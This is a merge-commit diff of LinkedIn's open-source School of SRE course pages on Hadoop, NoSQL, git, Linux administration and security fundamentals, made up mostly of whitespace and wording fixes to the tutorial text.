Merge branch 'main' into sql

This commit is contained in:
Sumesh Premraj 2020-11-26 21:23:09 +05:30 committed by GitHub
commit b47296da00
31 changed files with 243 additions and 227 deletions

View File

@ -3,3 +3,12 @@ We realise that the initial content we created is just a starting point and our
As a contributor, you represent that the content you submit is not plagiarised. By submitting the content, you (and, if applicable, your employer) are licensing the submitted content to LinkedIn and the open source community subject to the BSD 2-Clause license.
We suggest opening an issue first and seeking advice on your changes before submitting a pull request.
### Building and testing locally
Run the following commands to build and view the site locally before opening a PR.
```bash
pip install -r requirements.txt
mkdocs build
mkdocs serve
```

View File

@ -5,14 +5,14 @@
# Architecture of Hadoop
1. **HDFS**
1. The Hadoop Distributed File System (HDFS) is a distributed file system designed to run on commodity hardware. It has many similarities with existing distributed file systems. However, the differences from other distributed file systems are significant.
2. HDFS is highly fault-tolerant and is designed to be deployed on low-cost hardware. HDFS provides high throughput access to application data and is suitable for applications that have large data sets.
3. HDFS is part of the [Apache Hadoop Core project](https://github.com/apache/hadoop).
![HDFS Architecture](images/hdfs_architecture.png)
1. NameNode: acts as the arbitrator and central repository of the file namespace in the cluster. The NameNode executes operations such as opening, closing, and renaming files and directories.
2. DataNode: manages the storage attached to the node on which it runs. It is responsible for serving all the read and write requests. It performs operations on instructions from the NameNode, such as creation, deletion, and replication of blocks.
3. Client: responsible for getting the required metadata from the NameNode and then communicating with the DataNodes for reads and writes. </br></br></br>
2. **YARN**
@ -25,29 +25,29 @@
2. Resource Manager: It is the master daemon of YARN and is responsible for resource assignment and management among all the applications. Whenever it receives a processing request, it forwards it to the corresponding node manager and allocates resources for the completion of the request accordingly. It has two major components:
3. Scheduler: It performs scheduling based on the allocated application and available resources. It is a pure scheduler, which means that it does not perform other tasks such as monitoring or tracking and does not guarantee a restart if a task fails. The YARN scheduler supports plugins such as Capacity Scheduler and Fair Scheduler to partition the cluster resources.
4. Application Manager: It is responsible for accepting the application and negotiating the first container from the Resource Manager. It also restarts the Application Master container if a task fails.
5. Node Manager: It takes care of individual nodes in the Hadoop cluster and manages the application and workflow on that particular node. Its primary job is to keep up to date with the Resource Manager. It monitors resource usage, performs log management, and also kills a container based on directions from the Resource Manager. It is also responsible for creating the container process and starting it at the request of the Application Master.
6. Application Master: An application is a single job submitted to a framework. The Application Master is responsible for negotiating resources with the Resource Manager, tracking the status, and monitoring the progress of a single application. The Application Master requests the container from the Node Manager by sending a Container Launch Context (CLC), which includes everything an application needs to run. Once the application is started, it sends the health report to the Resource Manager from time to time.
7. Container: It is a collection of physical resources such as RAM, CPU cores, and disk on a single node. Containers are invoked by a Container Launch Context (CLC), which is a record that contains information such as environment variables, security tokens, dependencies, etc. </br></br>
# MapReduce framework
![MapReduce Framework](images/map_reduce.jpg)
1. The term MapReduce represents two separate and distinct tasks that Hadoop programs perform: the Map job and the Reduce job. Map jobs take data sets as input and process them to produce key-value pairs. The Reduce job takes the output of the Map job, i.e. the key-value pairs, and aggregates them to produce the desired results.
2. Hadoop MapReduce (Hadoop Map/Reduce) is a software framework for distributed processing of large data sets on computing clusters. MapReduce helps to split the input data set into a number of parts and run a program on all data parts in parallel at once.
3. The word count example below demonstrates the usage of the MapReduce framework:
![Word Count Example](images/mapreduce_example.jpg)
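Conceptually, the map step emits one word at a time and the reduce step aggregates the counts per word. As a rough single-machine analogue (a sketch, assuming a local text file named `input.txt`), the shell pipeline below uses `sort` in place of the shuffle phase:
```bash
# map: split text into one word per line; shuffle: sort groups identical words together;
# reduce: uniq -c counts each group, then we order by frequency
tr -s '[:space:]' '\n' < input.txt | sort | uniq -c | sort -rn
```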
</br></br>
# Other tooling around Hadoop
1. [**Hive**](https://hive.apache.org/)
1. Uses a language called HQL which is very SQL-like. Gives non-programmers the ability to query and analyze data in Hadoop. It is basically an abstraction layer on top of MapReduce.
2. Example HQL query:
1. _SELECT pet.name, comment FROM pet JOIN event ON (pet.name = event.name);_
3. In MySQL:
1. _SELECT pet.name, comment FROM pet, event WHERE pet.name = event.name;_
2. [**Pig**](https://pig.apache.org/)
1. Uses a scripting language called Pig Latin, which is more workflow-driven. You don't need to be an expert Java programmer, but you need a few coding skills. It is also an abstraction layer on top of MapReduce.
@ -66,7 +66,7 @@
3. [**Spark**](https://spark.apache.org/)
1. Spark provides primitives for in-memory cluster computing that allow user programs to load data into a cluster's memory and query it repeatedly, making it well suited to machine learning algorithms.
4. [**Presto**](https://prestodb.io/)
1. Presto is a high-performance, distributed SQL query engine for Big Data.
2. Its architecture allows users to query a variety of data sources such as Hadoop, AWS S3, Alluxio, MySQL, Cassandra, Kafka, and MongoDB.
3. Example Presto query:
```mysql
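-- a hypothetical query for illustration only (table and column names are invented)
SELECT origin_state, COUNT(*) AS total_flights
FROM flights
GROUP BY origin_state;
```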
@ -80,4 +80,4 @@
1. In order to transport the data over the network or to store it on some persistent storage, we use the process of translating data structures or object state into binary or textual form. We call this process serialization.
2. Avro data is stored in a container file (a .avro file) and its schema (the .avsc file) is stored with the data file.
3. Apache Hive provides support to store a table as Avro and can also query data in this serialization format.
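For illustration, a minimal `.avsc` schema might look like the following (the record and field names here are hypothetical):
```json
{
  "type": "record",
  "name": "User",
  "fields": [
    {"name": "name", "type": "string"},
    {"name": "age", "type": "int"}
  ]
}
```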

View File

@ -7,7 +7,7 @@
## What to expect from this course
This course covers the basics of Big Data and how it has evolved to become what it is today. We will take a look at a few realistic scenarios where Big Data would be a perfect fit. An interesting assignment on designing a Big Data system is followed by understanding the architecture of Hadoop and the tooling around it.
## What is not covered under this course
@ -32,7 +32,7 @@ Writing programs to draw analytics from data.
# Overview of Big Data
1. Big Data is a collection of large datasets that cannot be processed using traditional computing techniques. It is not a single technique or a tool, rather it has become a complete subject, which involves various tools, techniques, and frameworks.
2. Big Data could consist of
1. Structured data
2. Unstructured data
@ -50,9 +50,8 @@ Writing programs to draw analytics from data.
1. Take the example of the traffic lights problem.
1. There are more than 300,000 traffic lights in the US as of 2018.
2. Let us assume that we placed a device on each of them to collect metrics and send it to a central metrics collection system.
3. If each of the IoT devices sends 10 events per minute, we have 300000x10x60x24 = 432x10^7 events per day.
4. How would you go about processing that and telling me how many of the signals were “green” at 10:45 am on a particular day?
2. Consider the next example on Unified Payments Interface (UPI) transactions:
1. We had about 1.15 billion UPI transactions in the month of October 2019 in India.
2. If we try to extrapolate this data to about a year (1.15 billion × 12 ≈ 13.8 billion transactions) and try to find out some common payments that were happening through a particular UPI ID, how do you suggest we go about that?

View File

@ -1,8 +1,8 @@
# Tasks and conclusion
## Post-training tasks:
1. Try setting up your own 3-node Hadoop cluster.
1. A VM based solution can be found [here](http://hortonworks.com/wp-content/uploads/2015/04/Import_on_VBox_4_07_2015.pdf)
2. Write a simple Spark/MR job of your choice and understand how to generate analytics from data.
1. Sample dataset can be found [here](https://grouplens.org/datasets/movielens/)
@ -11,4 +11,4 @@
1. [Hadoop documentation](http://hadoop.apache.org/docs/current/)
2. [HDFS Architecture](http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HdfsDesign.html)
3. [YARN Architecture](http://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/YARN.html)
4. [Google GFS paper](https://storage.googleapis.com/pub-tools-public-publication-data/pdf/035fc972c796d33122033a0614bc94cff1527999.pdf)

View File

@ -38,10 +38,10 @@ Over time due to the way these NoSQL databases were developed to suit requiremen
1. **Document databases:** They store data in documents similar to [JSON](https://www.json.org/json-en.html) (JavaScript Object Notation) objects. Each document contains pairs of fields and values. The values can typically be a variety of types, including things like strings, numbers, booleans, arrays, or objects, and their structures typically align with the objects developers are working with in code. The advantages include an intuitive data model & flexible schemas. Because of their variety of field value types and powerful query languages, document databases are great for a wide variety of use cases and can be used as a general purpose database. They can horizontally scale out to accommodate large data volumes (see the example document after this list). Ex: MongoDB, Couchbase
2. **Key-Value databases:** These are a simpler type of database where each item contains keys and values. A value can typically only be retrieved by referencing its key, so learning how to query for a specific key-value pair is typically simple. Key-value databases are great for use cases where you need to store large amounts of data but you don't need to perform complex queries to retrieve it. Common use cases include storing user preferences or caching. Ex: [Redis](https://redis.io/), [DynamoDB](https://aws.amazon.com/dynamodb/), [Voldemort](https://www.project-voldemort.com/voldemort/)/[Venice](https://engineering.linkedin.com/blog/2017/04/building-venice--a-production-software-case-study) (LinkedIn)
3. **Wide-Column stores:** They store data in tables, rows, and dynamic columns. Wide-column stores provide a lot of flexibility over relational databases because each row is not required to have the same columns. Many consider wide-column stores to be two-dimensional key-value databases. Wide-column stores are great for when you need to store large amounts of data and you can predict what your query patterns will be. Wide-column stores are commonly used for storing Internet of Things data and user profile data. [Cassandra](https://cassandra.apache.org/) and [HBase](https://hbase.apache.org/) are two of the most popular wide-column stores.
4. **Graph Databases:** These databases store data in nodes and edges. Nodes typically store information about people, places, and things while edges store information about the relationships between the nodes. The underlying storage mechanism of graph databases can vary. Some depend on a relational engine and “store” the graph data in a table (although a table is a logical element, therefore this approach imposes another level of abstraction between the graph database, the graph database management system and the physical devices where the data is actually stored). Others use a key-value store or document-oriented database for storage, making them inherently NoSQL structures. Graph databases excel in use cases where you need to traverse relationships to look for patterns such as social networks, fraud detection, and recommendation engines. Ex: [Neo4j](https://neo4j.com/)
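As an illustration of the document model described in point 1 above, a single stored document might look like this (all field names are hypothetical):
```json
{
  "_id": "user42",
  "name": "Asha",
  "interests": ["sre", "databases"],
  "address": {"city": "Bengaluru", "country": "IN"}
}
```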
### **Comparison**
@ -200,18 +200,18 @@ The table below summarizes the main differences between SQL and NoSQL databases.
* **Flexible Data Models**
Most NoSQL systems feature flexible schemas. A flexible schema means you can easily modify your database schema to add or remove fields to support evolving application requirements. This facilitates continuous development of new application features without database operation overhead.
* **Horizontal Scaling**
Most NoSQL systems allow you to scale horizontally, which means you can add cheaper, commodity hardware whenever you want to scale a system. On the other hand, SQL systems generally scale vertically (a more powerful server). NoSQL systems can also host huge data sets when compared to traditional SQL systems.
* **Fast Queries**
NoSQL can generally be a lot faster than traditional SQL systems due to data denormalization and horizontal scaling. Most NoSQL systems also tend to store similar data together, facilitating faster query responses.
* **Developer productivity**
NoSQL systems tend to map data based on the programming data structures. As a result, developers need to perform fewer data transformations, leading to increased productivity & fewer bugs.

View File

@ -32,15 +32,15 @@ NoSQL systems support different levels of eventual consistency models. For examp
* **Read Your Own Writes Consistency**
A client will see their updates immediately after they are written. The reads can hit nodes other than the one where it was written. However, they might not see updates by other clients immediately.
* **Session Consistency**
A client will see the updates to their data within a session scope. This generally indicates that reads & writes occur on the same server. Other clients using the same nodes will receive the same updates.
* **Causal Consistency**
A system provides causal consistency if the following condition holds: write operations that are related by potential causality are seen by each process of the system in order. Different processes may observe concurrent writes in different orders.
@ -51,7 +51,7 @@ Eventual consistency is useful if concurrent updates of the same partitions of d
The consistency model chosen for the system (or parts of it) determines where requests are routed, e.g. to which replicas.
**CAP alternatives illustration**
<table>

View File

@ -2,7 +2,7 @@
Coming back to our local repo, which has two commits: so far, what we have is a single line of history. Commits are chained in a single line. But sometimes you may need to work on two different features in parallel in the same repo. Now, one option here could be making a new folder/repo with the same code and using that for the other feature's development. But there's a better way: use _branches._ Since git follows a tree-like structure for commits, we can use branches to work on different sets of features. From a commit, two or more branches can be created, and branches can also be merged.
Using branches, there can exist multiple lines of histories and we can checkout to any of them and work on it. Checking out, as we discussed earlier, would simply mean replacing contents of the directory (repo) with the snapshot at the checked out version.
Let's create a branch and see what it looks like:
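A minimal sketch of the commands involved (assuming we name the branch `b1`, as in the listings below):
```bash
# create a new branch named b1 pointing at the current commit
git branch b1
# list branches; the current branch is marked with an asterisk
git branch
```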
@ -66,7 +66,7 @@ spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph
* df2fb7a adding file 1
```
Notice how branch b1 is not visible here since we are on master. Let's try to visualize both to get the whole picture:
```bash
spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph --all

View File

@ -94,7 +94,7 @@ Notice how after adding the file, git status says `Changes to be committed:`. Wh
### More About a Commit
Commit is a snapshot of the repo. Whenever a commit is made, a snapshot of the current state of the repo (the folder) is taken and saved. Each commit has a unique ID (`df2fb7a` for the commit we made in the previous step). As we keep adding/changing more and more contents and keep making commits, all those snapshots are stored by git. Again, all this magic happens inside the `.git` folder. This is where all these snapshots or versions are stored _in an efficient manner._
### Adding More Changes
@ -131,7 +131,7 @@ spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph
### Are commits really linked?
As I just said, the two commits we just made are linked via a tree-like data structure, and we saw how they are linked. But let's actually verify it. Everything in git is an object. Newly created files are stored as an object. Changes to a file are stored as objects, and even commits are objects. To view the contents of an object, we can use the following command with the object's ID. We will take a look at the contents of the second commit
```bash
spatel1-mn1:school-of-sre spatel1$ git cat-file -p 7f3b00e
@ -253,4 +253,4 @@ spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph
* df2fb7a adding file 1
```
We just edited the `master` reference file and now we can see only the first commit in git log. Undoing the change to the file brings the state back to the original. Not so much of magic, is it?

View File

@ -22,7 +22,7 @@ applypatch-msg.sample fsmonitor-watchman.sample pre-applypatch.sample pr
commit-msg.sample post-update.sample pre-commit.sample pre-rebase.sample prepare-commit-msg.sample
```
Names are self-explanatory. These hooks are useful when you want to do certain things when a certain event happens. For example, if you want to run tests before pushing code, you would want to set up `pre-push` hooks. Let's try to create a pre-commit hook.
```bash
spatel1-mn1:school-of-sre spatel1$ echo "echo this is from pre commit hook" > .git/hooks/pre-commit
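spatel1-mn1:school-of-sre spatel1$ chmod +x .git/hooks/pre-commit  # hooks run only if the file is executable (assumed follow-up step)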

View File

@ -2,26 +2,26 @@
<img src="img/sos.png" width=200 >
In early 2019, we started visiting campuses to recruit the brightest minds to ensure that LinkedIn, and all the services that it is composed of, is always available for everyone. This function at LinkedIn falls in the purview of the Site Reliability Engineering team and Site Reliability Engineers (SREs), who are software engineers specializing in reliability. SREs apply the principles of computer science and engineering to the design and development of computer systems: generally, large distributed ones.
As we continued on this journey, we started getting a lot of questions from these campuses on what exactly the site engineering role entails, and how someone could learn the skills and disciplines involved to become a successful site engineer. Fast forward a few months, and a few of these campus students had joined LinkedIn either as interns or as full-time engineers to become a part of the Site Engineering team; we also had a few lateral hires who joined our organization who were not from a traditional SRE background. That's when a few of us got together and started to think about how we can onboard new graduate engineers to the site engineering team.
There is a vast amount of resources scattered throughout the web on what the roles and responsibilities of SREs are, how to monitor site health, handle incidents, maintain SLOs/SLIs, etc. But there are very few resources out there guiding someone on all the basic skill sets one has to acquire as a beginner. Because of the lack of these resources, we felt that individuals were having a tough time getting into open positions in the industry. We created the School Of SRE as a starting point for anyone wanting to build their career in the role of SRE.
In this course, we are focusing on building strong foundational skills. The course is structured in a way to provide more real-life examples and show how learning each of the topics can play a bigger role in your day-to-day SRE life. Currently, we are covering the following topics under the School Of SRE:
- Fundamentals Series
    - [Linux Basics](https://linkedin.github.io/school-of-sre/linux_basics/intro/)
    - [Git](https://linkedin.github.io/school-of-sre/git/git-basics/)
    - [Linux Networking](https://linkedin.github.io/school-of-sre/linux_networking/intro/)
    - [Python and Web](https://linkedin.github.io/school-of-sre/python_web/intro/)
- Data
    - [Relational databases(MySQL)](https://linkedin.github.io/school-of-sre/databases_sql/intro/)
    - [NoSQL concepts](https://linkedin.github.io/school-of-sre/databases_nosql/intro/)
    - [Big Data](https://linkedin.github.io/school-of-sre/big_data/intro/)
- [Systems Design](https://linkedin.github.io/school-of-sre/systems_design/intro/)
- [Security](https://linkedin.github.io/school-of-sre/security/intro/)
We believe continuous learning will help in acquiring deeper knowledge and competencies in order to expand your skill sets; every module has added references which could be a guide for further learning. Our hope is that by going through these modules you will be able to build the essential skills required for a Site Reliability Engineer.
At LinkedIn, we are using this curriculum for onboarding our non-traditional hires and new college grads to the SRE role. We had multiple rounds of successful onboarding experiences with the new members and helped them to be productive in a very short period of time. This motivated us to open source this content to help other organizations onboard new engineers to the role, and individuals to get into the role. We realize that the initial content we created is just a starting point, and we hope that the community can help in the journey of refining and extending the content.

View File

@ -1,7 +1,7 @@
# Conclusion
We have covered the basics of Linux operating systems and basic commands used in Linux.
We have also covered the Linux server administration commands.
We hope that this course will make it easier for you to operate on the command line.


View File

@ -1,31 +1,32 @@
# Linux Basics
## Introduction
### Prerequisites
- Comfortable using any operating system like Windows, Linux or Mac
- Fundamental knowledge of operating systems
## What to expect from this course
This course is divided into three parts. In the first part, we cover the
fundamentals of Linux operating systems. We will talk about Linux architecture,
Linux distributions and uses of Linux operating systems. We will also talk about the
difference between GUI and CLI.
In the second part, we cover some basic commands used in Linux.
We will focus on commands used for navigating the file system, viewing and manipulating files,
I/O redirection etc.
In the third part, we cover Linux system administration. This includes day to day tasks
performed by Linux admins, like managing users/groups, managing file permissions,
monitoring system performance, log files etc.
In the second and third parts, we will use examples to understand the concepts.
## What is not covered under this course
We are not covering advanced Linux commands and bash scripting in this
course. We will also not be covering Linux internals.
## Course Contents
@ -64,16 +65,18 @@ The following topics has been covered in this course:
## What are Linux operating systems
Most of us are familiar with the Windows operating system, used in more than
75% of personal computers. The Windows operating systems
are based on the Windows NT kernel.
A kernel is the most important part of
an operating system - it performs important functions like process
management, memory management, filesystem management etc.
Linux operating systems are based on the Linux kernel. A Linux-based
operating system will consist of the Linux kernel, GUI/CLI, system libraries
and system utilities. The Linux kernel was independently developed and
released by Linus Torvalds. The Linux kernel is free and open-source -
[https://github.com/torvalds/linux](https://github.com/torvalds/linux)
History of Linux -
@ -81,12 +84,12 @@ History of Linux -
## What are popular Linux distributions
A Linux distribution (distro) is an operating system based on
the Linux kernel and a package management system. A package management
system consists of tools that help in installing, upgrading,
configuring and removing software on the operating system.
Software is usually adapted to a distribution and packaged in a
distro specific format. These packages are available through a distro
specific repository. Packages are installed and managed in the operating
system by a package manager.
@ -119,7 +122,7 @@ system by a package manager.
- The Linux kernel is monolithic in nature.
- System calls are used to interact with the Linux kernel space.
- Kernel code can only be executed in the kernel mode. Non-kernel code is executed in the user mode.
@ -127,13 +130,13 @@ system by a package manager.
## Uses of Linux Operating Systems
Operating systems based on the Linux kernel are widely used in:
- Personal computers
- Servers
- Mobile phones - Android is based on the Linux operating system
- Embedded devices - watches, televisions, traffic lights etc
@ -159,10 +162,10 @@ to perform a particular operation.
## Shell vs Terminal
Shell is a program that takes commands from the
users and gives them to the operating system for processing. Shell is an
example of a CLI (command line interface). Bash is one of the most popular shell
programs available on Linux servers. Other popular shell programs are
zsh, ksh and tcsh.
Terminal is a program that opens a window and lets you interact with the

View File

@ -3,7 +3,7 @@
In this course, we will try to cover some of the common tasks that a Linux
server administrator performs. We will first try to understand what a
particular command does and then try to understand the commands using
examples. Do keep in mind that it's very important to practice the Linux
commands on your own.
## Lab Environment Setup
@ -14,20 +14,20 @@ commands on your own.
![](images/linux/admin/image19.png)
- We will run most of the commands used in this module in the above Docker container.
## Multi-User Operating Systems
An operating system is considered multi-user if it allows multiple people/users to use a computer without affecting each other's files and preferences. Linux-based operating systems are multi-user in nature as they allow multiple users to access the system at the same time. A typical computer will only have one keyboard and monitor, but multiple users can log in via SSH if the computer is connected to the network. We will cover more about SSH later.
As a server administrator, we are mostly concerned with Linux servers which are physically located far away from us. We can connect to these servers with the help of remote login methods like SSH.
Since Linux supports multiple users, we need to have a method which can protect the users from each other. One user should not be able to access and modify the files of other users.
## User/Group Management
- Each user in Linux has an associated user ID called UID
- Each user also has a home directory and a login shell associated with him/her
@ -37,13 +37,13 @@ Since linux supports multiple users, we need to have a method which can protect
### id command
The `id` command can be used to find the uid and gid associated with a user.
It also lists the groups to which the user belongs.
The uid and gid associated with the root user are 0.
![](images/linux/admin/image30.png)
A good way to find out the current user in Linux is to use the `whoami`
command.
![](images/linux/admin/image35.png)
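For quick reference, the commands themselves are shown below (the outputs in the screenshots above will vary from system to system):
```bash
id        # print uid, gid and group memberships of the current user
id root   # the same, for a specific user
whoami    # print the current username
```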
@ -74,19 +74,19 @@ through below links:
## Important commands for managing users
Some of the commands which are used frequently to manage users/groups
on Linux are the following:
- `useradd` - Creates a new user
- `passwd` - Adds or modifies passwords for a user
- `usermod` - Modifies attributes of a user
- `userdel` - Deletes a user
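As a quick sketch of how these commands fit together (run as root; `shivam` is the example user used later in this module):
```bash
useradd shivam               # create the user
passwd shivam                # set the user's password (prompts interactively)
usermod -s /bin/bash shivam  # modify an attribute, here the login shell
userdel -r shivam            # delete the user and remove their home directory
```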
### useradd
The `useradd` command adds a new user in Linux.
We will create a new user 'shivam'. We will also verify that the user
has been created by tailing the /etc/passwd file. The uid and gid are
@ -141,7 +141,7 @@ Try 'usermod -h' for a list of attributes you can modify.
### userdel
The `userdel` command is used to remove a user on Linux. Once we remove a
user, all the information related to that user will be removed.
Let's try to delete the user "amit". After deleting the user, you will
@ -172,7 +172,7 @@ We will now try to add user "shivam" to the group we have created above.
password for user "shivam" and user "root" using the passwd command
described in the above section.**
The `su` command can be used to switch users in Linux. Let's now try to
switch to user "shivam".
![](images/linux/admin/image37.png)
@ -182,7 +182,7 @@ Let's now try to open the "/etc/shadow" file.
![](images/linux/admin/image29.png)
The operating system didn't allow the user "shivam" to read the content
of the "/etc/shadow" file. This is an important file in linux which
of the "/etc/shadow" file. This is an important file in Linux which
stores the passwords of users. This file can only be accessed by root or
users who have the superuser privileges.
@ -224,7 +224,7 @@ commands from anywhere.
One easy way of providing root access to users is to add them to a group
which has permissions to run all the commands. "wheel" is a group in
Red Hat Linux with such privileges.
![](images/linux/admin/image25.png)
@ -245,7 +245,7 @@ to user “shivam” by adding him to the group “wheel”.
## File Permissions
On a Linux operating system, each file and directory is assigned access
permissions for the owner of the file, the members of a group of related
users and everybody else. This is to make sure that one user is not
allowed to access the files and resources of another user.
@ -266,7 +266,7 @@ related to file permissions.
### Chmod command
The chmod command is used to modify file and directory permissions in
Linux.
The chmod command accepts permissions as a numerical argument. We can
think of permissions as a series of bits with 1 representing True or
@ -299,7 +299,7 @@ in the similar way.
### Chown command
The chown command is used to change the owner of files or
directories in Linux.
Command syntax: chown \<new_owner\> \<file_name\>
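For instance (hypothetical file and user names):
```bash
chown shivam notes.txt   # make user 'shivam' the owner of notes.txt
```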
@ -318,7 +318,7 @@ similar way.
### Chgrp command
The chgrp command can be used to change the group ownership of files or
directories in Linux. The syntax is very similar to that of the chown
command.
![](images/linux/admin/image27.png)
@ -412,7 +412,7 @@ General syntax: scp \<source\> \<destination\>
## Package Management
Package management is the process of installing and managing software on
the system. We can install the packages which we require from the Linux
package distributor. Different distributors use different packaging
systems.
@ -433,7 +433,7 @@ systems.
[DNF](https://docs.fedoraproject.org/en-US/quick-docs/dnf/) is
the successor to YUM which is now used in Fedora for installing and
managing packages. DNF may replace YUM in the future on all RPM based
Linux distributions.
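A few common `dnf` operations, as a sketch (run as root; `httpd` is the package used as an example later in this module):
```bash
dnf install httpd   # install a package
dnf update httpd    # update it to the latest available version
dnf remove httpd    # uninstall it
```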
![](images/linux/admin/image20.png)
@ -450,7 +450,7 @@ httpd package.
## Process Management
In this section, we will study some useful commands that can be
used to monitor the processes on Linux systems.
### ps (process status)
@ -482,7 +482,7 @@ processes.
### top
The top command is used to show information about Linux processes
running on the system in real time. It also shows a summary of the
system information.
@ -521,7 +521,7 @@ additional information about io and cpu usage.
## Checking Disk Space
In this section, we will study some useful commands that can be
used to view disk space on Linux.
### df (disk free)
@ -581,7 +581,7 @@ used to start/stop/restart the services managed by systemd.
In this section, we will talk about some important files and directories
which can be very useful for viewing system logs and application logs
in Linux. These logs can be very useful when you are troubleshooting on
the system.
![](images/linux/admin/image58.png)

View File

@ -10,7 +10,7 @@
![The Wide Area of security](images/image1.png)
- SREs should be involved in both significant design discussions and actual system changes.
- They have quite a big role in system design & hence are often the first line of defence.
- SREs help in preventing bad design & implementations which can affect the overall security of the infrastructure.
- Successfully designing, implementing, and maintaining systems requires a commitment to **the full system lifecycle**. This commitment is possible only when security and reliability are central elements in the architecture of systems.
- Core Pillars of Information Security:
@ -26,17 +26,17 @@
- Security Principles By OWASP (Open Web Application Security Project)
- Minimize attack surface area:
- Every feature that is added to an application adds a certain amount of risk to the overall application. The aim of secure development is to reduce the overall risk by reducing the attack surface area.
- For example, a web application implements online help with a search function. The search function may be vulnerable to SQL injection attacks. If the help feature was limited to authorized users, the attack likelihood is reduced. If the help feature's search function was gated through centralized data validation routines, the ability to perform SQL injection is dramatically reduced. However, if the help feature was re-written to eliminate the search function (through a better user interface, for example), this almost eliminates the attack surface area, even if the help feature was available to the Internet at large.
- Establish secure defaults:
- There are many ways to deliver an “out of the box” experience for users. However, by default, the experience should be secure, and it should be up to the user to reduce their security if they are allowed.
- For example, by default, password ageing and complexity should be enabled. Users might be allowed to turn these two features off to simplify their use of the application and increase their risk.
- Default passwords of routers and IoT devices should be changed.
- Principle of Least privilege
- The principle of least privilege recommends that accounts have the least amount of privilege required to perform their business processes. This encompasses user rights, resource permissions such as CPU limits, memory, network, and file system permissions.
- For example, if a middleware server only requires access to the network, read access to a database table, and the ability to write to a log, this describes all the permissions that should be granted. Under no circumstances should the middleware be granted administrative privileges.
- Principle of Defence in depth
- The principle of defence in depth suggests that where one control would be reasonable, more controls that approach risks in different fashions are better. Controls, when used in depth, can make severe vulnerabilities extraordinarily difficult to exploit and thus unlikely to occur.
- With secure coding, this may take the form of tier-based validation, centralized auditing controls, and requiring users to be logged on all pages.
- For example, a flawed administrative interface is unlikely to be vulnerable to an anonymous attack if it correctly gates access to production management networks, checks for administrative user authorization, and logs all access.
- Fail securely
@ -58,26 +58,26 @@
- Don't trust services
- Many organizations utilize the processing capabilities of third-party partners, who more than likely have different security policies and posture than you. It is unlikely that you can influence or control any external third party, whether they are home users or major suppliers or partners.
- Therefore, the implicit trust of externally run systems is not warranted. All external systems should be treated similarly.
- For example, a loyalty program provider provides data that is used by Internet Banking, providing the number of reward points and a small list of potential redemption items. However, the data should be checked to ensure that it is safe to display to end-users and that the reward points are a positive number, and not improbably large.
- Separation of duties
- The key to fraud control is the separation of duties. For example, someone who requests a computer cannot also sign for it, nor should they directly receive the computer. This prevents the user from requesting many computers and claiming they never arrived.
- Certain roles have different levels of trust than normal users. In particular, administrators are different from normal users. In general, administrators should not be users of the application.
- For example, an administrator should be able to turn the system on or off and set password policy, but shouldn't be able to log on to the storefront as a super-privileged user, such as being able to “buy” goods on behalf of other users.
- Avoid security by obscurity
- Security through obscurity is a weak security control, and nearly always fails when it is the only control. This is not to say that keeping secrets is a bad idea, it simply means that the security of systems should not be reliant upon keeping details hidden.
- For example, the security of an application should not rely upon knowledge of the source code being kept secret. The security should rely upon many other factors, including reasonable password policies, defence in depth, business transaction limits, solid network architecture, and fraud and audit controls.
- A practical example is Linux. Linux's source code is widely available, and yet when properly secured, Linux is a secure and robust operating system.
- Keep security simple
- Attack surface area and simplicity go hand in hand. Certain software engineering practices prefer overly complex approaches to what would otherwise be a relatively straightforward and simple design.
- Developers should avoid the use of double negatives and complex architectures when a simpler approach would be faster and simpler.
- For example, although it might be fashionable to have a slew of singleton entity beans running on a separate middleware server, it is more secure and faster to simply use global variables with an appropriate mutex mechanism to protect against race conditions.
- Fix security issues correctly
- Once a security issue has been identified, it is important to develop a test for it and to understand the root cause of the issue. When design patterns are used, the security issue is likely widespread amongst all codebases, so developing the right fix without introducing regressions is essential.
- For example, a user has found that they can see another users balance by adjusting their cookie. The fix seems to be relatively straightforward, but as the cookie handling code is shared among all applications, a change to just one application will trickle through to all other applications. The fix must, therefore, be tested on all affected applications.
- Reliability & Security
- Reliability and security are both crucial components of a truly trustworthy system, but building systems that are both reliable and secure is difficult. While the requirements for reliability and security share many common properties, they also require different design considerations. It is easy to miss the subtle interplay between reliability and security that can cause unexpected outcomes.
- Ex: A password management application failure was triggered by a reliability problem (poor load-balancing and load-shedding strategies), and its recovery was later complicated by multiple measures designed to increase the security of the system (an HSM mechanism that has to be plugged into server racks and acts as an authentication factor, with the HSM token supposedly locked inside a case, and so on).
---
### Ciphers
- Ciphers are the cornerstone of cryptography. A cipher is a set of algorithms that performs encryption or decryption on a message. An encryption algorithm (E) takes a secret key (k) and a message (m) and produces a ciphertext (c). Similarly, a decryption algorithm (D) takes the secret key (k) and a ciphertext (c) and recovers the message (m). They are represented as follows:
```
E(k,m) = c
D(k,c) = m
```
- This also means that for it to be a cipher, it must satisfy the consistency equation as follows, making it possible to decrypt.
```
D(k,E(k,m)) = m
```
Stream Ciphers:
- The message is broken into characters or bits and enciphered with a key or keystream (which should be random and generated independently of the message stream) that is as long as the plaintext bitstream.
- If the keystream is random, this scheme would be unbreakable unless the keystream was acquired, making it unconditionally secure. The keystream must be provided to both parties in a secure way to prevent its release.
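A minimal sketch of this idea in Python (a toy XOR keystream cipher for illustration, not production cryptography):
```
# Toy stream cipher: XOR each plaintext byte with a keystream byte.
# With a truly random, never-reused keystream as long as the message,
# this is the unconditionally secure scheme described above.
import secrets

def xor_stream(data, keystream):
    return bytes(d ^ k for d, k in zip(data, keystream))

message = b"attack at dawn"
keystream = secrets.token_bytes(len(message))        # random, message-length key
ciphertext = xor_stream(message, keystream)          # E(k,m) = c
assert xor_stream(ciphertext, keystream) == message  # D(k,E(k,m)) = m
```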
Block Ciphers:
Asymmetric Key Algorithm
Diffie-Hellman
- The protocol has two system parameters, p and g. They are both public and may be used by everybody. Parameter p is a prime number, and parameter g (usually called a generator) is an integer smaller than p, with the following property: for every number n between 1 and p1 inclusive, there is a power k of g such that n = g^k mod p.
- The Diffie-Hellman algorithm is an asymmetric algorithm used to establish a shared secret for a symmetric key algorithm. Nowadays most people use a hybrid cryptosystem, i.e., a combination of symmetric and asymmetric encryption. Asymmetric encryption is used as a technique in the key exchange mechanism to share a secret key, and after the key is shared between sender and receiver, the communication takes place using symmetric encryption. The shared secret key is used to encrypt the communication.
